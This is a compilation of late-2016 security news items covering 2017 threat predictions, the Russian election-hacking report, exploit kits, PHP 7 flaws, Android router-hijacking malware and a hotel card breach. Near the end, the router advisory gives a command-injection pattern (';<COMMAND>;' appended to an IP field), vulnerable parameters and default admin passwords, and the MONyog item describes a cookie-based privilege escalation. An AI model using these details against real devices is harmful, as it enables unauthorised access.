As an increasing number of Chinese companies are focused on European and US markets, they will continue to maintain their customer base in China. “Huawei, already a fairly well-known brand in the west, is pushing its Honor brand as a way to drop the budget image for a new demographic. And software firms are getting in the game too. Tencent, makers of WeChat (that’s ‘China’s WhatsApp’, for those playing along at home), is pushing hard into the west, taking on Facebook at its own game.”

And, what cyber threats are coming down the line in 2017?

* Old breaches surfacing – A more dangerous trend than the malware that emerged in 2016 is that of past breaches surfacing. The information in historical breaches has often been sold on the darknet for some time before the breach’s existence comes to light. That is essentially what happened to Yahoo and it happened twice in one year, when the data breaches from 2013 and 2014 resurfaced. The breaches impacted a billion and half a billion accounts respectively. As The Guardian aptly explains it: “Because data breaches can happen undetected, fixing your cybersecurity in 2016 isn’t just locking the stable door after the horse has bolted; it’s locking the stable door without even realizing the horse made its escape years ago.”

* Cyberwar – As was the case with the Stuxnet virus which destroyed Iranian nuclear centrifuges and the US Office of Personnel Management hack, the thing that makes launching a cyberwar attack appealing is that attribution is difficult. The incidents are usually explained away with hunches as opposed to being able to provide conclusive evidence. “Rock-solid attribution to not just a nation but a chain of command is almost impossible,” The Guardian’s Alex Hern has noted. And, according to security expert Hitesh Sheth, head of cybersecurity firm Vectra, “US businesses and the US government should expect an increase in the number and severity of cyber-attacks, led by select nation states and organised political and criminal entities.”

* More innovative hackers – According to Adam Meyer, chief security strategist at SurfWatch Labs, “2017 will be the year of increasingly creative [hacks].”

* Step aside single-target ransomware. Make way for the self-propagating worms of the past, such as Conficker, Nimda, and Code Red, which will return to prominence—but this time around they will carry ransomware payloads capable of infecting hundreds of machines in an astoundingly short period of time.

* DDoS attacks on IoT devices – Hackers will target all types of internet-connected endpoints and employ them in DDoS attacks, but at a higher rate than before. Network World reports that, “in the rush to roll out all manner of IoT devices, security has taken a back seat. That means more serious incidents such as the denial of service attack on domain lookup service Dyn, are highly likely. The Mirai botnet was cited as the culprit, exploiting 50 to 100 thousand IoT devices.”

* DDoS will also bourgeon into a “weapon of mass obstruction” – DDoS attack firepower in 2016 catapulted to frightening levels – rising from 400Gbps bandwidth to 1Tbps or more. This was due to millions of IoT devices lacking even the most basic security. That same firepower can be utilized to take down critical infrastructure and even the internet infrastructure of whole countries. This may be done in conjunction with a physical military attack.

* Inexperienced, albeit dangerous hackers who will not need a skill set – There are now tools that are relatively easy to access, for those who are willing to pay for them. CSO Online predicts, “this trend will continue to spark the rapid growth of cybercriminals in the wild. Whether someone is politically motivated, disgruntled about something, or a career criminal, off-the-shelf hacking tools make it easier for them to make their mark and will cost companies millions in 2017.”

* Malware via third-party vendors – Third-party vendors are a potential gateway to their connected customers. So, no matter how great a business’s security system is, if that business doesn’t hold all of their third-party partners to the same level of scrutiny, their customers will always be at risk. Consider the situation involving Wendy’s in which over 1,000 franchised locations were compromised by a Point-of-Sale (PoS) malware attack. You can count on more, similar activity in 2017 and that will be the case until companies address third-party risk management.

* Shortage of IT security professionals – This is not a new issue, of course, but with more than a million vacant positions worldwide, there have never been more jobs available in cybersecurity.

* State-sponsored hackers – A concern for both organizations and governments now is the steadily growing cadres of state-sponsored hackers, who have an endless array of resources.

* The cloud & mobile computing – Applications and data are moving to the cloud. This, no doubt, will create a new aggregation of vulnerabilities. It stands to reason, though, since “the ‘cloud’ is just someone else’s computer, and by moving and sharing information across more devices and people, the attack surface grows—and so does the opportunity for attackers.”

* Drones will be used not only for attacks, but for espionage, too – Threat actors will be moving in the direction of leveraging capabilities that will allow hacking into drone signals and “dronejacking.”

* An onslaught of attacks on open source – Hackers have come to the realization that applications are an easily exploited weak spot in most organizations. Couple that with the lax job most companies are doing with securing and managing their code–even when patches are available! Hence, these types of exploits will increase in 2017–against sites, applications, and IoT devices.

* Phishing expeditions – Employees are the weakest link in security. Almost all enterprise hacks begin with phishing. However, as noted by Taylor Armerding, writing for CSO Online, “they will need to pay closer attention to the rise in popularity of free SSL certifications paired with Google’s recent initiative to label HTTP-only sites as unsafe. That will weaken security standards, driving potential spear-phishing or malware programs.”

* Hacking Cars – Automobile manufacturers don’t really know much about the software installed in the cars they make because it comes from third parties. In addition to that, this will most likely include open-source components with security vulnerabilities–a hacker’s paradise. This will also likely lead to a large-scale automobile hack, which could include “cars held for ransom, self-driving cars being hacked to obtain their location for hijacking, unauthorized surveillance and intelligence gathering, or other threats.”

* Potential for cyber attacks on grids and nuclear facilities – Again, emphasis should be placed on the human element. The Stuxnet incident demonstrated how a tenacious hacker can overcome cyber protection efforts simply by targeting vulnerable employees. This applies to both grids and nuclear facilities. And, the cybersecurity of both has been abysmally lacking.

Terrorism Trends in the West

According to a report by IHS Jane’s Terrorism and Insurgency Centre (JTIC), recent attacks by ISIS illustrate its use of returned foreign fighters to launch attacks, called for by the terror group’s central leadership. “Western members of the group in Iraq or Syria would communicate with supporters back in their home countries in order to directly encourage, support, and direct attacks therein.”

Moreover, the recent escalation in terror attacks in the West will likely continue in 2017. And, the trends contributing to the current level of terror, that have been building up for years, have not yet peaked. ISIS has exhibited a clear operational presence in Europe and it will take years to come to eliminate the threat posed by these terror groups and the individuals they recruit.

The new year will bring with it fascinating innovations in technology, which in turn will provide hackers and terrorists a multitude of new ways to launch attacks.

FBI-DHS JAR report links Russian hackers to Presidential Election hacks
31.12.2016 securityaffairs Cyber

A FBI-DHS JAR report released implicated Russian hacking group APT28 and APT29 in attacks against 2016 Presidential Election.
The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) published on Thursday a Joint Analysis Report(JAR) that provides information about the tools, infrastructure and TTPs used by the Russian civilian and military intelligence Services (RIS) against United States election.

U.S. Government linked the cyber activity to a Russian threat actor designated as GRIZZLY STEPPE. This is the first time that the JAR attributes a malicious cyber activity to specific countries or threat actors.

“In foreign countries, RIS actors conducted damaging and/or disruptive cyber-attacks, including attacks on critical infrastructure networks. In some cases, RIS actors masqueraded as third parties, hiding behind false online personas designed to cause the victim to misattribute the source of the attack. This JAR provides technical indicators related to many of these operations, recommended mitigations, suggested actions to take in response to the indicators provided, and information on how to report such incidents to the U.S. Government.” States the report.

Despite the vast majority of information reported in the JAR were known to the experts I invite you to focus on the first statement of the above excerpt, because according to the President Obama’ executive order issued in April 2015, an attack against critical infrastructure can trigger an unpredictable cyber response of the US Government.

The JAR reports the activity of two different RIS actors, the APT28 and the APT29, that participated in the cyber attacks on a US political party. The APT29 known as (Cozy Bear, Office Monkeys, CozyCar, The Dukes and CozyDuke) broke into the party’s systems in summer 2015. The APT28 known as (Fancy Bear, Pawn Storm, Sofacy Group, Sednit and STRONTIUM) entered in spring 2016.

Both groups and their activities were well known to security firms and intelligence agencies due to their cyber espionage campaigns that targeted organizations and companies worldwide.

The nation-state actors conducted numerous attacks leveraging spear phishing messages containing web links to a malicious dropper, also APT28 group relied heavily on shortened URLs in their spearphishing email campaigns. These take advantage of neutral space for setting up operational infrastructure to obfuscate their source infrastructure.

“APT29 has been observed crafting targeted spearphishing campaigns leveraging web links to a malicious dropper; once executed, the code delivers Remote Access Tools (RATs) and evades detection using a range of techniques. APT28 is known for leveraging domains that closely mimic those of targeted organizations and tricking potential victims into entering legitimate credentials” reads the JAR. “Once APT28 and APT29 have access to victims, both groups exfiltrate and analyze information to gain intelligence value. These groups use this information to craft highly targeted spearphishing campaigns. These actors set up operational infrastructure to obfuscate their source infrastructure, host domains and malware for targeting organizations, establish command and control nodes, and harvest credentials and other valuable information from their targets,”

Government experts explained both groups used multiple malware in their campaigns, including the XTunnel malware, the Fysbis backdoor, the Komplex Trojan, the Carberp malware.

Experts observed two waves of attacks against US targets starting in the summer of 2015 and in November 2016.

According to the FBI-DHS JAR report, nation-state hackers designated as Grizzly Steppe targeted more than US recipients in April 2015 as part of a spear phishing campaign.

“In summer 2015, an APT29 spearphishing campaign directed emails containing a malicious link to over 1,000 recipients, including multiple U.S. Government victims. APT29 used legitimate domains, to include domains associated with U.S. organizations and educational institutions, to host malware and send spearphishing emails.” Continues the report.

In Spring 2016, hackers belonging to the APT28 hacker group, targeted the same political party via spear phishing email aimed to trick victims into changing their email credetianls. The hackers used a fake webmail domain hosted on operational infrastructure used by the APT28. Then APT28 used the stolen credentials to gain access target systems and exfiltrate sensitive information. The APT28 breached U.S. Democratic Congressional Campaign Committee (DCCC).

“In the spring of 2016, attackers were again successful when they tricked a spear phishing recipient to change their password through a fake web domain controlled by the attackers. “Using the harvested credentials, APT28 was able to gain access and steal content, likely leading to the exfiltration of information from multiple senior party members.””

The JAR report confirmed information stolen by hackers was released to the press and publicly disclosed in the attempt to interfere with Presidential Election. The report does not explicitly refers the DNC, but almost any security firm that analyzed the attack confirmed that the DNC was the primary target of the Russian hackers.

JAR Report

“Actors likely associated with RIS are continuing to engage in spearphishing campaigns, including one launched as recently as November 2016, just days after the U.S. election”

The JAR report also include a Recommended Mitigations section with best practices and mitigation strategies to improve cyber security posture of organizations.

“DHS encourages network administrators to implement the recommendations below, which can prevent as many as 85 percent of targeted cyber-attacks. ” states the report.

#OpSingleGateway – Gh0s7 hacked Thai Government website in response to the recent arrests
31.12.2016 securityaffairs Cyber

#OpSingleGateway – The hacker Gh0s7 hacked the Thailand’s National Statistical Office (http://nso.go.th) in response to the recent arrests operated by the Government.
The hacker Gh0s7 broke into the database of the Thailand’s National Statistical Office (http://nso.go.th ) and leaked data through the Mega service at the following URL


The hacker acted alone, he decides to hack into a Thai Government system in response to the recent arrest of local authorities.

Thai officials announced on Monday the arrests of nine teenagers, aged between 17 and 20, who have participated in cyber-attacks against government websites.

Thai Deputy Prime Minister and Defense Minister Prawit Wongsuwan announced further arrests among the local community of hacktivists.

Last week, Thai Police arrested nine teenagers belonging to the Anonymous collective because their participation in the hacking campaign dubbed #OpSingleGateway. The #OpSingleGateway campaign was launched by the Anonymous collective last year when the Thai government proposed a bill that would force the country’s entire Internet traffic through one single gateway.

Clearly, the bill opens the doors to monitoring and censorship, for this reason, hackers started targeting the Government.

“I personally targeted it. and my motivations was the recent events that Thai gov arresting 9 Anonymous hackers for #OpSingleGateway” told me Gh0s7.

Thai members of the Anonymous powered massive DDoS attacks in October 2015 against the Thai government (thaigov.go.th) and of the country’s Ministry of Information, Communications and Technology (ICT) (mict.go.th) websites.

Anonymous also breached the websites of Thai police and local ISPs, then Thai government decided to drop the “single gateway” bill.

Unfortunately, the Government proposed amendments to the existing Computer Crime Act in May 2016 and approved them on December 16. The amendments allow the authorities to monitor citizens and to apply a strong censorship on opponents.

“Anonymous hackers tried to oppose the passing of these amendments, which allow the government to censor websites and intercept private communications without a court order, according to VoaNews.

Just like the previous year, Anonymous used a Facebook group called “Citizens Against Single Gateway” to rally the population and carry out similar DDoS attacks against government websites.” reported the bleepingcomputer.com website.

“Another of these F5-powered DDoS attacks hit Thailand’s defense ministry website on December 19. Later it was revealed that hackers also breached the Thai Police Office website two days earlier, on December 17. The website of the Ministry of Tourism and Sports was also attacked on December 23.”

Back to the Gh0s7’s hack, the leaked archive includes usernames and hashed passwords alongside other CMS data. The hacker told me that he hacked the server and gained root access.

“My hacks are secret as usual but I exploited their server, and gained root access.” he told me.

Sundown Exploit Kit now leverages on the steganography
31.12.2016 securityaffairs

A new variant of the Sundown exploit kit leverages on steganography to hide exploit code in harmless-looking image files.
Security experts from Trend Micro have spotted a new version of the Sundown exploit kit that exploits steganography in order to hide malicious code in harmless-looking image files.

The use of steganography was recently observed in the malvertising campaigns conducted by the AdGholas and GooNky groups.

The GooNky group leveraged on steganography to hide malvertising traffic, while AdGholas has used a more sophisticated technique leveraging the Stegano exploit kit.

Crooks encoded a script in the alpha channel of an image to deliver the malicious code via rogue ads that looked like legitimate.

Earlier in December, researchers from ESET discovered that Stegano hide portions of its malicious code in parameters controlling the transparency of pixels used to display banner ads, but the impact of the appearance of the images is almost imperceptible.

“The malicious version of the graphic has a script encoded in its alpha channel, which defines the transparency of each pixel. Since the modification is minor, the final picture’s color tone is only slightly different to that of the clean version” reads the analysis published by ESET.

A similar technique has been observed for a new version of the Sundown EK spotted by the researchers at Trend Micro on December 27.

“On December 27, 2016, we noticed that Sundown was updated to use similar techniques. The PNG files weren’t just used to store harvested information; the malware designers now used steganography to hide their exploit code.” reads the analysis published by Trend Micro.

The updated version of Sundown has been used in several malvertising campaigns, mostly targeting users in Japan, Canada, France and the US.

“The newly updated exploit kit was used by multiple malvertising campaigns to distribute malware. The most affected countries were Japan, Canada, and France, though Japanese users accounted for more than 30% of the total targets.”

Sundown exploit kit

The new Sundown EK leverages on hidden iframes that automatically connects to a page hosting the Sundown EK. The page downloads a white PNG image and decodes malicious code it contains.

“In this updated version, the exploit kit’s malvertisement creates a hidden iframe that automatically connects to the Sundown landing page,” continues the post.“The page will retrieve and download a white PNG image. It then decodes the data in this PNG file to obtain additional malicious code.”

Researchers from Trend Micro leveraged on malicious code to trigger Internet Explorer flaws CVE-2015-2419 and CVE-2016-0189, and the Flash Player flaw tracked as CVE-2016-4117.

The researchers observed threat actors leveraging on the Sundown EK to deliver the Chthonic banking Trojan, a variant of the infamous Zeus malware, that was used by crooks in a PayPal scam in July.

The Sundown EK ranks today at the second place, behind RIG EK that is the most used crimeware kit in the criminal ecosystem.

According to security experts from Cisco Talos, threat actors behind the Sundown exploit kit leverage on an infrastructure composed of 80,000 malicious subdomains associated with more than 500 domains.

The experts observed that crooks behind the Sundown EK are using wildcards for subdomains which are exponentially growing the number of routes for malicious traffic to servers hosting the dreaded exploit kit.

President Obama executive order ejected 35 Russians out of US
30.12.2016 securityaffairs Cyber

An executive order issued by President Obama applies sanctions on Russian military and intelligence officials. 35 Russian operatives were ejected.
President Barack Obama issued an executive order to impose sanctions on a number of Russian military and intelligence officials in response to the alleged hacking campaigns against the 2016 US Presidential Election.

The US ejected 35 Russian intelligence operatives from the United States and imposed sanctions on nine entities and individuals.

The Russians individuals ejected by the US Government are working out of the Russia’s consulate in San Francisco and the Russian embassy in Washington.

According to a White House fact sheet issued on the executive order, the individuals due to the “harassment of our diplomatic personnel in Russia by security personnel and police.”

The US Government sanctioned the Russian intelligence services, the GRU (Russian Main Intelligence Directorate) and the FSB (Federal Security Service), four GRU officers, and three other organizations. The actions are the Obama administration’s response to a Russian hacking and disinformation campaign used to interfere in the American election process.

The order was issued concurrently a report from US intelligence that confirms the cyber attacks against the 2015 Presidential election aimed to influence the results of the vote.

The Department of Homeland Security and Federal Bureau of Investigation issued a Joint Analysis Report (JAR) containing “declassified technical information on Russian civilian and military intelligence services’ malicious cyber activity, to better help network defenders in the United States and abroad identify, detect, and disrupt Russia’s global campaign of malicious cyber activities,” according to an Obama administration statement.

“The JAR includes information on computers around the world that Russian intelligence services have co-opted without the knowledge of their owners in order to conduct their malicious activity in a way that makes it difficult to trace back to Russia.”

Some of the data were not disclosed before, they are part of declassified government report.

The JAR includes technical details about the malicious code used by the Russian intelligence services in its campaigns. The report also includes the “indicators of compromise” for the malware used by the Russian hackers.

“All Americans should be alarmed by Russia’s actions.” reads a President Obama’s statement.

The executive order addresses the GRU, FSB, the Esage Lab of the Russian security company, the firm Special Technology Center, and Russia’s Professional Association of Designers of Data Processing Systems. The four individuals targeted by the order are the GRU chief General-Lieutenant Igor Korobov, the GRU Deputy Chief and Head of Signals Intelligence Sergey Aleksandrovich Gizunov, the GRU First Deputy Chiefs Igor Olegovich Kostyukov and Vladimir Stepanovich Alexseyev.

The Letter from the President specifically refers Obama’s executive order issued in April and explains it has broader:

“The order amends section 1(a) of Executive Order 13694 by providing authority for blocking the property and interests in property of any person determined by the Secretary of the Treasury, in consultation with the Attorney General and the Secretary of State, to be responsible for or complicit in, or to have engaged in, directly or indirectly, cyberenabled activities originating from, or directed by persons located, in whole or in substantial part, outside the United States that are reasonably likely to result in, or have materially contributed to, a significant threat to the national security, foreign policy, or economic health or financial stability of the United States and that have the purpose or effect of … tampering with, altering, or causing a misappropriation of information with the purpose or effect of interfering with or undermining election processes or institutions.”

The order intends to persecute and individual that operates to interfere with the US Internal Affairs, for example conducting hacking activities or distributing information that may interfere with elections and other political events.

What will happen in the next months?

It is difficult to say, President Trump will have to share the Obama’s approach against Russian interference or downplay the Russian threat.

On December 28, Trump responded to a question about sanctions over the hacking against US infrastructure:

“I think we ought to get on with our lives. I think that computers have complicated lives very greatly. The whole age of computer has made it where nobody knows exactly what is going on. We have speed, we have a lot of other things, but I’m not sure we have the kind, the security we need.”

Meantime President Obama confirmed that the sanctions just applied will be placed side by side with other measures against any interference on US Internal Affairs.”We will continue to take a variety of actions at a time and place of our choosing, some of which will not be

“We will continue to take a variety of actions at a time and place of our choosing, some of which will not be publicised.”

“In addition to holding Russia accountable for what it has done, the United States and friends and allies around the world must work together to oppose Russia’s efforts to undermine established international norms of behavior, and interfere with democratic governance.” said the President Obama.

“To that end, my Administration will be providing a report to Congress in the coming days about Russia’s efforts to interfere in our election, as well as malicious cyber activity related to our election cycle in previous elections.”

Let’s close with a curiosity, the Russian Embassy in London responded tweeting of a picture of a duck with the word LAME written across the bottom.

CheckPoint experts spotted Three Critical 0-Day in PHP 7
30.12.2016 securityaffairs

Researchers at the security firm CheckPoint have discovered three fresh critical zero day vulnerability in the last PHP 7.
Security researchers at the firm CheckPoint have discovered three fresh critical 0-day vulnerabilities in last PHP 7.

These vulnerabilities allow an attacker to take full control over 80 percent of websites which run on the latest release of the popular web programming language. The bad news is that one of the vulnerabilities remains unpatched again.

Security researchers at Check Point’s have analyzed in the last months PHP 7 and focused their efforts into “the unserialized mechanism” which is one of the most well-known vulnerable areas of PHP.

This is the same mechanism that was strongly exploited in PHP 5 and allowed attackers to compromise popular platforms, including Magento, vBulletin, Drupal, Joomla!, Pornhub’s website and other affected web servers in past, by sending maliciously crafted data in client cookies or to expose API calls.

The vulnerabilities are tracked as:

CVE-2016-7479 User After Free(UAF) Code Execution
CVE-2016-7480 Use of Uninitialized Value Code Execution
CVE-2016-7478 Remote Denial of Service
The exploitation of the first two vulnerabilities could allow an attacker to take complete control over affected servers, this means that it is possible to exploit them to spread malware as well as to steal data they store.

The last vulnerability triggers a remote Denial of Service attack/threat which basically hangs the website, exhausts its memory consumption, and a possible site down.


“The first vulnerability allows a remote attacker to unserialize a pathological exception object which refers to itself as the previous exception.” states the report. “When invoking the __toString method of this exception, the code iterates over the chain of exceptions. As the chain of exceptions consists of just that one object that points to itself, the iteration never terminates. “

For more technical details about the vulnerabilities give a look at the report.

“We have reported the three vulnerabilities to the PHP security team on the 15th of September and 6th of August. The PHP security team issued fixes for two of the vulnerabilities on the 13th of October and 1st of December.”

To ensure your webserver’s security, we recommend you should upgrade to latest version of PHP and stay tuned on PHP’s official site for news and updates.

Below the list of vulnerable PHP versions:

CVE-2016-7479 Version <= 7.0.13
CVE-2016-7480 Version < 7.0.12
CVE-2016-7478 Version <= 7.0.13 and 5.6.26

The OSCE organization was victim of a major cyber attack
30.12.2016 securityaffairs Cyber

The Organization for Security and Co-operation in Europe (OSCE) confirmed to have suffered suffer a “major” cyber attack.
Hackers targeted the Organisation for Security and Cooperation in Europe (OSCE), the news was confirmed on Wednesday by a spokeswoman for the organization.

The OSCE is a security and human rights watchdog, clearly the attack is part of a cyber espionage operation, unfortunately, the organization confirmed that it did not have the capability to investigate the incident.

According to the French newspaper Le Monde, Russian hackers are responsible for the attack.

“There was an attack. We found out about it at the beginning of November,” the OSCE spokeswoman Mersiha Causevic Podzic told AFP.

“The systems are safe now. We were given entirely new security systems and passwords,” she added.

The cyber attack “compromised the confidentiality” of the OSCE IT network and put “its integrity at risk,” fortunately the organization was still able to operate.

According to an unnamed Western intelligence source quoted by Le Monde, the attack was powered once again by the Russian APT group known as APT28 (aka known as Fancy Bear, APT 28, Pawn Storm, Sednit or Sofacy). The group is considered by security experts the responsible of numerous cyber attacks against the 2016 US Presidential Election.

The spokeswoman at the OSCE avoided commenting the attribution of the attack suffered by its organization. The organization wants to avoid any “speculation” that APT28 may have launched the cyber attack.

“But we don’t have the capacity to conduct such an investigation and we don’t want to speculate,” she said.

The OSCE said “the way in which the attacker accessed the OSCE was identified, as have some of the external communication destinations”.

France’s ambassador to the OSCE tried to downplay the dangers for the organization explaining that officials in Vienna are trained to avoid being victims of cyber attacks.

“Diplomats at the OSCE are warned that attempted spying, in whatever form, are part and parcel of this organisation,” Veronique Roger-Lacan told AFP.

The OSCE is composed of 57 members from North America, Europe, and Asia, including Russia and also Ukraine.

“The OSCE works for stability, peace and democracy for more than a billion people, through political dialogue about shared values and through practical work that aims to make a lasting difference.” reads the mission of the organization. “With its Institutions, expert units and network of field operations, the OSCE addresses issues that have an impact on our common security, including arms control, terrorism, good governance, energy security, human trafficking, democratization, media freedom and national minorities.”

The organization is known for its role of an observer in elections and for its role in Ukraine. The OSCE was tasked to monitor a ceasefire agreement to end fighting between Ukrainian and Russian separatists, it currently employed 700 monitors focused on the dispute in the eastern Ukraine.

Researcher found a severe flaw in the MONyog monitoring tool
30.12.2016 securityaffairs

A security expert discovered a vulnerability in the MONyog tool that could be exploited by a normal user to elevate his privilege access.
The security researcher and penetration tester Mutail Mohamed (@muleyl) discovered a vulnerability in the MONyog, the most secure and scalable MySQL monitoring tool of the server monitoring tool.

The application URL is https://www.webyog.com/product/monyog and the affected version is MONyog Ultimate 6.63.

The flaw resides in the session management on Monyog application, it could be exploited by a normal user to elevate his privilege access by altering the session.

MONyog flaw

The exploitation of the flaw is very simple, the user just has to change the perimeters in the cookie store at that session.

The value associated with a normal user is 0, attackers can change it to 1 to gain admin privileges.

The researcher demonstrated that is to elevate privileges by manipulating the value of the following Cookie parameters;
The hack will allow the user to create roles, view the passwords stored in the setup and change other settings via the admin section.

Below a video PoC of the exploitation of the flaw.

I reached the researcher for a comment:
“Since this is a commercial application and organizations pay for this, they At least need something secure and worth that price. ” explained Mutail.
“The organization could have a huge impact on this, because if let’s say a normal user goes rogue, he could get admin level access to organizations network. Since this application does use LDAP authentication. “

3 Critical Zero-Day Flaws Found in PHP 7 — One Remains Unpatched!
29.12.2016 thehackernews
3 Critical Zero-Day Flaws Found in PHP 7
Three critical zero-day vulnerabilities have been discovered in PHP 7 that could allow an attacker to take complete control over 80 percent of websites which run on the latest version of the popular web programming language.
The critical vulnerabilities reside in the unserialized mechanism in PHP 7 – the same mechanism that was found to be vulnerable in PHP 5 as well, allowing hackers to compromise Drupal, Joomla, Magento, vBulletin and PornHub websites and other web servers in the past years by sending maliciously crafted data in client cookies.
Security researchers at Check Point's exploit research team spent several months examining the unserialized mechanism in PHP 7 and discovered "three fresh and previously unknown vulnerabilities" in the mechanism.
While researchers discovered flaws in the same mechanism, the vulnerabilities in PHP 7 are different from what was found in PHP 5.
Tracked as CVE-2016-7479, CVE-2016-7480, and CVE-2016-7478, the zero-day flaws can be exploited in a similar manner as a separate vulnerability (CVE-2015-6832) detailed in Check Point's August report.
CVE-2016-7479—Use-After-Free Code Execution
CVE-2016-7480—Use of Uninitialized Value Code Execution
CVE-2016-7478—Remote Denial of Service
The first two vulnerabilities, if exploited, would allow a hacker to take full control over the target server, enabling the attacker to do anything from spreading malware to steal customer data or to defacing it.
The third vulnerability could be exploited to generate a Denial of Service (DoS) attack, allowing a hacker to hang the website, exhaust its memory consumption and eventually shut down the target system, researchers explain in their report [PDF].
According to Yannay Livneh of Check Point's exploit research team, none of the above vulnerabilities were found exploited in the wild by hackers.
The check Point researchers reported all the three zero-day vulnerabilities to the PHP security team on September 15 and August 6.
Patches for two of the three flaws were issued by the PHP security team on 13th October and 1st December, but one of them remains unpatched.
Besides patches, Check Point also released IPS signatures for the three vulnerabilities on the 18th and 31st of October to protect users against any attack that exploits these vulnerabilities.
In order to ensure the webserver’s security, users are strongly recommended to upgrade their servers to the latest version of PHP.

New Android Malware Hijacks Router DNS from Smartphone
29.12.2016 thehackernews Android
Another day, another creepy malware for Android users!
Security Researchers have uncovered a new Android malware targeting your devices, but this time instead of attacking the device directly, the malware takes control over the WiFi router to which your device is connected to and then hijacks the web traffic passing through it.
Dubbed "Switcher," the new Android malware, discovered by researchers at Kaspersky Lab, hacks the wireless routers and changes their DNS settings to redirect traffic to malicious websites.
Over a week ago, Proofpoint researchers discovered similar attack targeting PCs, but instead of infecting the target's machines, the Stegano exploit kit takes control over the local WiFi routers the infected device is connected to.
Switcher Malware carries out Brute-Force attack against Routers
Hackers are currently distributing the Switcher trojan by disguising itself as an Android app for the Chinese search engine Baidu (com.baidu.com), and as a Chinese app for sharing public and private Wi-Fi network details (com.snda.wifilocating).
Once victim installs one of these malicious apps, the Switcher malware attempts to log in to the WiFi router the victim's Android device is connected to by carrying out a brute-force attack on the router's admin web interface with a set of a predefined dictionary (list) of usernames and passwords.
"With the help of JavaScript [Switcher] tries to login using different combinations of logins and passwords," mobile security expert Nikita Buchka of Kaspersky Lab says in a blog post published today.
"Judging by the hard coded names of input fields and the structures of the HTML documents that the trojan tries to access, the JavaScript code used will work only on web interfaces of TP-LINK Wi-Fi routers."
Switcher Malware Infects Routers via DNS Hijacking

Once accessed web administration interface, the Switcher trojan replaces the router's primary and secondary DNS servers with IP addresses pointing to malicious DNS servers controlled by the attackers.
Researchers said Switcher had used three different IP addresses –, and – as the primary DNS record, one is the default one while the other two are set for specific internet service providers.
Due to change in router's DNS settings, all the traffic gets redirected to malicious websites hosted on attackers own servers, instead of the legitimate site the victim is trying to access.
"The Trojan targets the entire network, exposing all its users, whether individuals or businesses, to a wide range of attacks – from phishing to secondary infection," the post reads.
"A successful attack can be hard to detect and even harder to shift: the new settings can survive a router reboot, and even if the rogue DNS is disabled, the secondary DNS server is on hand to carry on."
Researchers were able to access the attacker’s command and control servers and found that the Switcher malware Trojan has compromised almost 1,300 routers, mainly in China and hijacked traffic within those networks.
The Bottom Line
Android users are required to download applications only from official Google's Play Store.
While downloading apps from third parties do not always end up with malware or viruses, it certainly ups the risk. So, it is the best way to avoid any malware compromising your device and the networks it accesses.
You can also go to Settings → Security and make sure "Unknown sources" option is turned off.
Moreover, Android users should also change their router's default login and passwords so that nasty malware like Switcher or Mirai, can not compromise their routers using a brute-force attack.

InterContinental Hotels investigating a possible card breach
29.12.2016 securityaffairs Crime

The company InterContinental Hotels Group (IHG) confirmed an ongoing investigation of alleged card breach at some of its properties.
The notorious investigators Brian Krebs was informed of a possible security breach at the hotel company InterContinental Hotels Group (IHG). Krebs received the news of the alleged card breach by his sources in the financial industry. According to the experts, the pattern of fraudulent activities had been observed on credit and debit cards used at some IHG properties.

“Those sources said they were seeing a pattern of fraud on customer credit and debit cards that suggested a breach at some IHG properties — particularly Holiday Inn and Holiday Inn Express locations.” wrote Krebs.

“Asked about the fraud patterns reported by my sources, a spokesperson for IHG said the company had received similar reports, and that it has hired an outside security firm to help investigate.”

InterContinental Hotels

IHG has more than 5,000 hotels across the world, the group includes many brands such InterContinental, Holiday Inn, Crowne Plaza, Kimpton, Hualuxe, Indigo, and Even.

Representatives at the Group confirmed they had been aware of the fraud patterns and promptly started an investigation with the support of a security firm.

Below the statement issued by the IHG:

“IHG takes the protection of payment card data very seriously. We were made aware of a report of unauthorized charges occurring on some payment cards that were recently used at a small number of U.S.-based hotel locations. We immediately launched an investigation, which includes retaining a leading computer security firm to provide us with additional support. We continue to work with the payment card networks.”

“We are committed to swiftly resolving this matter. In the meantime, and in line with best practice, we recommend that individuals closely monitor their payment card account statements. If there are unauthorized charges, individuals should immediately notify their bank. Payment card network rules generally state that cardholders are not responsible for such charges.”

While the investigation is ongoing customers have to closely monitor their payment card statements and notify any suspicious transaction.

InterContinental hotels suffered other breaches in the past, payment systems at Kimpton Hotels & Restaurants were compromised by a PoS malware discovered this summer.

InterContinental hotels were also involved in a breach suffered earlier this year by HEI Hotels & Resorts.

The hospitality sector is a privileged target of hackers, according to the experts from Trustwave also the notorious Carbanak cybercrime gang changed strategy targeting organizations in the sector.

This yeas major companies operating in the industry admitted suffering a data breach including Hard Rock Hotel & Casino Las Vegas, Trump Hotels, and Millennium Hotels & Resorts.

ZyXEL Customized Routers plagues by multiple vulnerabilities
29.12.2016 securityaffairs

According to the firm SecuriTeam, several ZyXEL customized routers are affected by many vulnerabilities that could be easily exploited by hackers.
According to the firm SecuriTeam, multiple ZyXEL customized routers are affected by many vulnerabilities. The devices are distributed by the Thai IPS TrueOnline. The ZyXEL customized routers are offered for free to the customers with default settings, including default accounts and passwords, a gift for hackers.

The models are widespread, ZyXEL P660HN-T v1, ZyXEL P660HN-T v2, and Billion 5200W-T, the first of which since 2013.

“Several models are distributed by TrueOnline, three in particular are widespread:

ZyXEL P660HN-T v1 (distributed up to 2013)
ZyXEL P660HN-T v2
Billion 5200W-T (currently being distributed to new clients)
These are customized versions of existing ZyXEL and Billion routers. They are MIPS systems and they all run BOA web server.” reads the security advisory published by SecuriTeam.

ZyXEL customized routers

The vulnerabilities have been discovered by an independent security researcher, they include an unauthenticated remote command execution vulnerability in P660HN-T v1, an unauthenticated remote command execution and authenticated remote command execution flaws in Billion 5200W-T, and an unauthenticated remote command execution vulnerability in P660HN-T v2.

The P660HN-T v1 device is affected by a command injection vulnerability in Maintenance > Logs > System Log > Remote System Log, the issue resides in the remote_host parameter on the ViewLog.asp page, which is accessible by an unauthenticated attacker.

The network device comes with the following default credentials:

username: admin; password: password
username: true; password: true
An unauthenticated command injection is present in the adv_remotelog.asp file of the Billion 5200W-T router. An attacker can trigger the vulnerability in the syslogServerAddr parameter by entering a valid IP address followed by “;<COMMAND>;”.

The same device is affected by an authenticated command injections in the interface tools_time.asp with the uiViewSNTPServer parameter. Also in this case, the expert discovered the device includes the following default accounts:

username: admin; password: password
username: true; password: true
username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
